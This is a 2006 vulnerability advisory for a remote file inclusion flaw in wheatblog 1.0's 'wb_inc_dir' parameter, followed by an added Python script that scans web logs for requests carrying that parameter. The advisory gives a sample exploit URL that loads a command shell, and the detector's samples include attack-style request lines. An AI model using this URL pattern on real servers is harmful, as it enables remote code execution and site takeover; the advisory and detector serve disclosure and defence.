SECURITYVULNS:DOC:13125
Jun 13, 2006 - 12:00 a.m.

wheatblog 1.0 Version - "wb_inc_dir" Parameter File Inclusion Vulnerability

SaVSaK.CoM | SpC-x - The-BeKiR |

Risk : High

Class: Remote

Script : wheatblog

Credits : SpC-x

Thanks : The-BeKiR - Ejder - FasTBoY - ERNE - RMx - Nukedx - Str0ke

Code :

require_once('./settings.php');

$page_title = ':: view links';

include_once("$wb_inc_dir/header.php");

Vulnerable :

http://www.victim.com/wheatblog/view_links.php?wb_inc_dir=Command-Shell
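
Detection example (added here, not part of the original advisory or of wheatblog): a scan of web access logs for requests that supply the wb_inc_dir parameter named above. The log format, label names and sample lines are assumptions constructed for illustration, as is the premise that legitimate clients never send this parameter.

```python
import re
from urllib.parse import parse_qsl, urlsplit

PARAM = "wb_inc_dir"  # parameter named in the advisory
REQUEST = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# URL or stream-wrapper prefix (http://, ftp://, php://, data:), //host or \\host
REMOTE = re.compile(r"^(?:[a-z][a-z0-9+.\-]+:|//|\\\\)", re.I)

def classify(value):
    """Label a decoded wb_inc_dir value by how it would steer the include."""
    value = value.strip()
    if REMOTE.match(value):
        return "url-or-wrapper"
    if ".." in value or value.startswith(("/", "\\")):
        return "local-path"
    # Assumption: clients never need to send this parameter, so its mere
    # presence in a request is worth a look.
    return "param-present"

def scan(lines):
    """Return (line_no, client, label) for each request carrying the parameter.

    Only the query string is visible in an access log; the same variable sent
    in a POST body or cookie will not show up here.
    """
    findings = []
    for line_no, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for key, value in parse_qsl(query, keep_blank_values=True):
            # PHP rewrites '.' and ' ' in incoming variable names to '_'
            if re.sub(r"[ .]", "_", key) == PARAM:
                findings.append((line_no, line.split()[0], classify(value)))
    return findings

# Constructed sample lines (documentation addresses and hosts, not real traffic)
SAMPLE = [
    '203.0.113.7 - - [13/Jun/2006:10:01:02 +0000] "GET /wheatblog/view_links.php HTTP/1.1" 200 5120',
    '203.0.113.9 - - [13/Jun/2006:10:04:41 +0000] "GET /wheatblog/view_links.php?wb_inc_dir=http://host.example/inc%3F HTTP/1.0" 200 312',
    '198.51.100.4 - - [13/Jun/2006:10:09:13 +0000] "GET /wheatblog/view_links.php?wb.inc.dir=..%2F..%2Ftmp HTTP/1.1" 200 0',
    '198.51.100.4 - - [13/Jun/2006:10:09:20 +0000] "GET /wheatblog/view_links.php?wb_inc_dir=includes HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```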